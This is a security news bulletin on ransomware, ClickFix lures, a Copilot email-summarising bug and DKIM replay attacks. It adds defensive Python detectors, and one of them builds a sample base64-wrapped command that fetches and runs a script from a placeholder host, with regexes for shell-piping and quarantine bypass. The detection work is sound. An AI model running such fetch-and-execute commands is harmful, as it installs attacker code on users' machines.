Cybersecurity Alert: OpenSSL RCE, Foxit 0-Days, Copilot Leak, and AI Password Flaws Uncovered in Latest ThreatsDay Bulletin

The cyber threat landscape keeps shifting, with new risks, tactics, and security gaps surfacing across platforms, tools, and industries at the same time. This week brought developments that shape how defenders approach exposure, response, and preparedness.

This edition of the ThreatsDay Bulletin compiles these signals in one place for a quick, clear update on the cybersecurity and hacking landscape.

– Google has announced the first beta of Android 17, with privacy and security enhancements that include deprecating the cleartext traffic manifest attribute and adding support for HPKE (Hybrid Public Key Encryption) for secure communication.
– LockBit 5.0 ransomware now has a Windows version with defense evasion techniques and the ability to target Proxmox, an open-source virtualization platform.
– A new ClickFix campaign targeting Mac users, named Matryoshka, uses nested obfuscation layers to trick victims into executing malicious Terminal commands.
– Another ClickFix campaign delivers a malware-as-a-service (MaaS) loader called Matanbuchus 3.0, aimed at deploying ransomware or exfiltrating data.
– Threat actors in a ClickFix campaign use typosquatting to host malicious instructions on fake Homebrew websites, leading to credential theft and the deployment of a macOS infostealer.
– A 47-year-old man has been detained in Europe for suspected ties to the Phobos ransomware group, part of Europol’s Operation Aether targeting ransomware groups.
– Ransomware groups are increasingly targeting industrial organizations, with a significant rise in attacks on operational technology (OT) and industrial control systems (ICS) in 2025.
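The three ClickFix items above all hinge on the same trick: the victim is talked into pasting a one-liner that decodes one or more embedded layers and pipes the result into a shell. The following added example (not code from the original article or from any of the reports it summarizes) peels nested base64 layers out of such a command and flags the behaviours that matter, so an analyst can see the final command without running it. The sample commands are constructed; the 203.0.113.5 address is from the documentation range and update.sh is a hypothetical file name.

```python
"""Peel nested base64 layers out of a ClickFix-style one-liner and flag risky behaviour.

Added example, not from the original bulletin. Sample commands below are constructed:
203.0.113.5 is a documentation-range address and update.sh is a hypothetical name.
"""
import base64
import re
import string

B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
PRINTABLE = set(string.printable)

# Behaviours commonly chained in ClickFix lures; each regex is checked against every unpacked layer.
INDICATORS = {
    "remote-fetch-to-shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b"),
    "base64-decode-to-shell": re.compile(r"base64\s+(-d|-D|--decode)\b[^|]*\|\s*(ba|z)?sh\b"),
    "quarantine-bypass": re.compile(r"\bxattr\b.*com\.apple\.quarantine"),
    "applescript-exec": re.compile(r"\bosascript\b"),
    "detached-exec": re.compile(r"\bnohup\b|\bdisown\b"),
}


def _decode_layer(cmd: str):
    """Return the first base64 blob in cmd that decodes to printable text, else None."""
    for match in B64_BLOB.finditer(cmd):
        blob = match.group(0)
        blob += "=" * (-len(blob) % 4)  # tolerate padding stripped by the lure author
        try:
            text = base64.b64decode(blob, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text and set(text) <= PRINTABLE:
            return text
    return None


def unpack(cmd: str, max_depth: int = 10) -> list:
    """Return the layers from outermost to innermost, peeling one base64 layer per step."""
    layers = [cmd]
    while len(layers) <= max_depth:
        inner = _decode_layer(layers[-1])
        if inner is None or inner in layers:  # nothing left to peel, or a decode loop
            break
        layers.append(inner)
    return layers


def assess(cmd: str) -> dict:
    """Unpack the command and report which indicators fire across all layers."""
    layers = unpack(cmd)
    joined = "\n".join(layers)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(joined))
    return {"layers": layers, "final": layers[-1], "indicators": hits}


# Constructed samples: a two-layer "matryoshka" lure and a benign command for contrast.
INNER = "curl -fsSL http://203.0.113.5/update.sh | bash"


def _wrap(cmd: str, decoder: str = "base64 -d", shell: str = "sh") -> str:
    return f"echo {base64.b64encode(cmd.encode()).decode()} | {decoder} | {shell}"


NESTED = _wrap(_wrap(INNER), decoder="base64 --decode", shell="bash")
BENIGN = "ls -la ~/Downloads"

if __name__ == "__main__":
    for sample in (NESTED, BENIGN):
        result = assess(sample)
        print(f"layers={len(result['layers'])} final={result['final']!r}")
        print(f"indicators={result['indicators']}")
```

The decoder only descends into blobs that decode to printable text, so long identifiers or hashes that happen to look like base64 are skipped, and a decode loop or an absurd nesting depth stops at `max_depth`. Extending it to hex (`xxd -r -p`) or `printf`-escaped payloads is a matter of adding a second decoder to `_decode_layer`.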

Separately, a hacking group tracked as Pyroxene has been identified as carrying out “supply chain-leveraged attacks targeting defense, critical infrastructure, and industrial sectors, with operations expanding from the Middle East into North America and Western Europe.” The group often relies on initial access provided by PARISITE to pivot from IT networks into OT networks. Pyroxene’s activity overlaps with that attributed to Imperial Kitten (also tracked as Tortoiseshell), a threat actor associated with the cyber arm of Iran’s Islamic Revolutionary Guard Corps (IRGC).

In a separate incident, Microsoft acknowledged a bug (CW1226324) in Microsoft 365 Copilot that let the assistant summarize confidential emails from users’ Sent Items and Drafts folders without their consent, bypassing data loss prevention (DLP) policies. A fix was deployed on February 3, 2026, but the number of affected users or organizations was not disclosed.

Threat actors have also been abusing Atlassian Jira Cloud to distribute spam emails and malicious links, primarily to government and corporate recipients, with the aim of luring them to investment scams and online casino sites.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has ordered Federal Civilian Executive Branch (FCEB) agencies to patch a server-side request forgery (SSRF) vulnerability in GitLab (CVE-2021-22175) following reports of active exploitation against instances in several countries.

Additionally, a financially motivated threat actor named GS7 has been conducting phishing campaigns against Fortune 500 companies using Telegram bots to harvest credentials. This operation, dubbed Operation DoppelBrand, targets top financial institutions, technology firms, and healthcare organizations worldwide, aiming to steal credentials and potentially sell access to ransomware groups.

In a separate development, a new variant of the Remcos RAT has been observed using phishing emails to distribute malware that enables live surveillance and control over infected systems. This variant allows attackers to access live video streams from webcams, representing a significant shift in Remcos’ capabilities.

Lastly, Poland’s Ministry of Defence has barred Chinese-made vehicles equipped with surveillance technology from entering protected military facilities, citing national security concerns. The ban also restricts connecting work phones to the infotainment systems of Chinese-made vehicles, and the ministry plans a vetting process under which carmakers undergo security assessments before their vehicles are admitted to protected zones. The ministry describes the measures as proactive and aligned with the practices of NATO countries and other allies, and as part of a broader effort to adapt security protocols to the evolving technological landscape and the current needs of critical infrastructure protection.

Abuse of legitimate invoices and dispute notifications in so-called DKIM replay attacks is on the rise. Attackers use trusted vendor platforms such as PayPal, Apple, and DocuSign to insert scam instructions and phone numbers into user-controlled fields; because the vendor itself sends and DKIM-signs the resulting message, it passes SPF, DKIM, and DMARC checks, and the signed copy can then be forwarded to arbitrary recipients while the signature remains valid, bypassing email security controls that rely on DMARC.
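Because the signature on a replayed message is genuine, a DMARC pass tells the receiver nothing; the useful signals are whether the signature was ever bound to this recipient and how long it stays valid. The following added example (not code from the original bulletin or from any vendor named above) pulls those replay-risk signals out of a received message using only the Python standard library: whether `To` is in the signed header list (`h=`), whether the signature carries an expiration (`x=`) and how wide its window is, how stale the signing timestamp (`t=`) is, and whether the mailbox it was delivered to is among the signed recipients. The messages are constructed, the `bh=`/`b=` values are placeholders rather than real signatures, and vendor.example / corp.example / customer.example are hypothetical domains.

```python
"""Heuristic DKIM replay-risk signals for a received message (stdlib only).

Added example, not from the original bulletin. The sample messages are constructed;
bh=/b= are placeholders, and all domains are hypothetical. Thresholds are assumptions.
"""
import email
import email.utils
from email.message import Message

DAY = 86400


def parse_dkim_tags(header_value: str) -> dict:
    """Split a DKIM-Signature value into its tag=value pairs, ignoring folding whitespace."""
    tags = {}
    for part in header_value.replace("\r", "").replace("\n", "").split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def replay_signals(raw: str, now: int, max_window: int = 7 * DAY, max_age: int = 2 * DAY) -> list:
    """Return the replay-risk signals present in raw (an RFC 5322 message) as of epoch time now."""
    msg: Message = email.message_from_string(raw)
    sig = msg.get("DKIM-Signature")
    if sig is None:
        return ["no-dkim-signature"]
    tags = parse_dkim_tags(sig)
    signals = []

    # 1. If To is not covered by h=, the signature says nothing about who the mail was for.
    signed = [h.strip().lower() for h in tags.get("h", "").split(":") if h.strip()]
    if "to" not in signed:
        signals.append("to-header-not-signed")

    # 2. Without x= a captured message can be replayed forever; a wide t..x window is nearly as bad.
    t = int(tags["t"]) if tags.get("t", "").isdigit() else None
    x = int(tags["x"]) if tags.get("x", "").isdigit() else None
    if x is None:
        signals.append("no-expiration")
    else:
        if now > x:
            signals.append("signature-expired")
        if t is not None and x - t > max_window:
            signals.append("long-validity-window")

    # 3. A signature minted long before delivery is characteristic of a harvested-and-replayed message.
    if t is not None and now - t > max_age:
        signals.append("stale-signature")

    # 4. The strongest signal: this mailbox is not among the recipients the vendor actually addressed.
    delivered = email.utils.parseaddr(msg.get("Delivered-To", ""))[1].lower()
    recipients = {addr.lower() for _, addr in email.utils.getaddresses(msg.get_all("To", []))}
    if delivered and recipients and delivered not in recipients:
        signals.append("recipient-mismatch")
    return signals


def build_sample(signed_headers, to_addr, delivered_to, t, x=None) -> str:
    """Construct a minimal vendor-style message with a placeholder DKIM-Signature (no real crypto)."""
    tags = f"v=1; a=rsa-sha256; c=relaxed/relaxed; d=vendor.example; s=sel1; t={t};"
    if x is not None:
        tags += f" x={x};"
    tags += f" h={':'.join(signed_headers)}; bh=PLACEHOLDERBODYHASH=; b=PLACEHOLDERSIG="
    return (
        f"Delivered-To: {delivered_to}\r\n"
        f"DKIM-Signature: {tags}\r\n"
        "From: billing@vendor.example\r\n"
        f"To: {to_addr}\r\n"
        "Subject: Invoice #4821\r\n"
        "Message-ID: <4821@vendor.example>\r\n"
        "\r\n"
        "You have received an invoice. Questions? Call +1-555-0100 now.\r\n"
    )


T0 = 1_700_000_000
# Replayed: signed for one customer, delivered to someone else, no x=, To unsigned, weeks old.
REPLAYED = build_sample(["from", "subject", "message-id"], "buyer@customer.example", "victim@corp.example", T0)
# Clean: To signed, one-hour expiry, delivered to the addressed mailbox, received a minute later.
CLEAN = build_sample(["from", "to", "subject", "message-id"], "victim@corp.example", "victim@corp.example", T0, x=T0 + 3600)

if __name__ == "__main__":
    print("replayed:", replay_signals(REPLAYED, now=T0 + 30 * DAY))
    print("clean:   ", replay_signals(CLEAN, now=T0 + 60))
```

The check is deliberately independent of signature verification: run it after the normal DKIM/DMARC evaluation, and treat `recipient-mismatch` together with any of the timing signals as grounds to quarantine even a DMARC pass. On the sending side the same tags are the mitigation: sign `To`, set a short `x=`, and rate-limit identical signed bodies.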

A Huntress report documents a 277% increase in the abuse of Remote Monitoring and Management (RMM) software, which now features in 24% of all incidents the company observed. Because RMM tools are ubiquitous in enterprise environments, their misuse blends in with legitimate administration and is harder for defenders to detect, giving attackers stealth, persistence, and operational efficiency.
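The practical consequence of RMM ubiquity is that "RMM process started" is not a detection on its own; what stands out is an RMM product IT never deployed, an RMM binary launched from a browser or mail client rather than an installer service, or a second RMM product appearing on a host that already has the sanctioned one. The following added example (not code from the original bulletin or from Huntress) applies those three checks to process-creation events. The event lines are constructed, the binary-to-product mapping is a starter list to be replaced with your own inventory, and ScreenConnect being the approved product is an assumption.

```python
"""Flag suspicious RMM usage in process-creation events (constructed sample data).

Added example, not from the original bulletin. RMM_BINARIES is a starter list,
APPROVED_PRODUCTS is an assumed policy, and SAMPLE_EVENTS is constructed.
"""
import csv
import io
from collections import defaultdict

# Starter mapping of executable name -> RMM product (assumption: extend from your own inventory).
RMM_BINARIES = {
    "anydesk.exe": "AnyDesk",
    "teamviewer.exe": "TeamViewer",
    "screenconnect.clientservice.exe": "ScreenConnect",
    "screenconnect.windowsclient.exe": "ScreenConnect",
    "ateraagent.exe": "Atera",
    "splashtopstreamer.exe": "Splashtop",
}
# Assumed: the single product IT has sanctioned in this environment.
APPROVED_PRODUCTS = {"ScreenConnect"}
# Parents that indicate a user-launched download rather than an IT-managed install.
USER_FACING_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe", "explorer.exe"}

# Constructed process-creation events in a Sysmon-like shape (ts,host,user,image,parent).
SAMPLE_EVENTS = """\
ts,host,user,image,parent
2026-02-10T09:01:11Z,WS-101,CORP\\alice,C:\\Program Files (x86)\\ScreenConnect Client\\ScreenConnect.ClientService.exe,services.exe
2026-02-10T09:14:52Z,WS-101,CORP\\alice,C:\\Users\\alice\\Downloads\\AnyDesk.exe,chrome.exe
2026-02-10T10:02:03Z,WS-207,CORP\\bob,C:\\Program Files (x86)\\ScreenConnect Client\\ScreenConnect.ClientService.exe,services.exe
2026-02-10T11:30:45Z,WS-207,CORP\\bob,C:\\Windows\\System32\\notepad.exe,explorer.exe
2026-02-10T12:45:09Z,SRV-FILE01,NT AUTHORITY\\SYSTEM,C:\\Program Files\\Atera Networks\\AteraAgent\\AteraAgent.exe,services.exe
"""


def analyze(events_csv: str) -> list:
    """Return (host, product, reason) findings for RMM activity worth a closer look."""
    findings = []
    products_per_host = defaultdict(set)
    for row in csv.DictReader(io.StringIO(events_csv)):
        exe = row["image"].rsplit("\\", 1)[-1].lower()
        product = RMM_BINARIES.get(exe)
        if product is None:
            continue  # not an RMM binary we know about
        products_per_host[row["host"]].add(product)
        parent = row["parent"].lower()
        if product not in APPROVED_PRODUCTS:
            findings.append((row["host"], product, "unapproved-rmm"))
        if parent in USER_FACING_PARENTS:
            findings.append((row["host"], product, f"user-launched-from-{parent}"))
    # A second RMM product beside the sanctioned one is a classic sign of attacker-brought tooling.
    for host, products in sorted(products_per_host.items()):
        if len(products) > 1:
            findings.append((host, "+".join(sorted(products)), "multiple-rmm-products"))
    return findings


if __name__ == "__main__":
    for host, product, reason in analyze(SAMPLE_EVENTS):
        print(f"{host:12} {product:24} {reason}")
```

The approved product on WS-207 produces no finding at all, which is the point: the allowlist keeps the sanctioned tool quiet so that the AnyDesk download on WS-101 and the unexpected Atera agent on the file server are the only rows an analyst sees.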

Texas Attorney General Ken Paxton has filed lawsuits against TP-Link and Anzu Robotics, alleging deceptive marketing practices and security risks linked to the Chinese Communist Party. TP-Link denies the allegations, stating that neither the Chinese government nor the CCP controls the company or user data.

The North Korea-linked Contagious Interview campaign has expanded its data theft capabilities by tampering with the MetaMask wallet extension. Attackers use a JavaScript backdoor to install a fake version of MetaMask, capturing victims’ wallet unlock passwords and gaining access to cryptocurrency funds.

Malicious activity targeting the hotel and retail sector has resurged, with threat actors impersonating the Booking.com platform through phishing kits to harvest credentials and banking information from hotel businesses and customers.

Exploitation of security flaws in Ivanti Endpoint Manager Mobile (EPMM) has allowed attackers to establish persistent access, delivering malware and maintaining long-term control over mobile device management infrastructure. The campaign has targeted various sectors in the U.S., Germany, Australia, and Canada, underscoring the need to apply patches promptly. In a related development, Germany’s Federal Office for Information Security (BSI) has reported evidence of exploitation dating back to the summer of 2025 and has urged organizations to audit their systems for indicators of compromise (IoCs) going back to July 2025.

New research by Irregular has found that passwords generated directly by a large language model (LLM) may appear strong but are fundamentally insecure. The artificial intelligence (AI) security company recommends avoiding LLM-generated passwords and using proper, cryptographically secure password generation methods instead.

Cybersecurity researchers have identified vulnerabilities in popular PDF platforms from Foxit and Apryse that could lead to account takeover and other security issues.

Training labs that expose deliberately vulnerable applications to the public internet have been found to pose significant risk, giving attackers a foothold from which to compromise systems and sensitive data.

The Oyster malware loader has evolved, refining its command-and-control (C2) infrastructure and obfuscation methods to improve stealth.

Noodlophile, a malware family distributed via fake AI tools, has been found to contain a message taunting researchers, likely in response to being exposed.

The OpenSSL project has patched a vulnerability in its cryptographic library that could lead to remote code execution.

Finally, new research has highlighted the risk posed by delegated machine accounts, which can allow unauthorized access to critical non-human identities in a domain.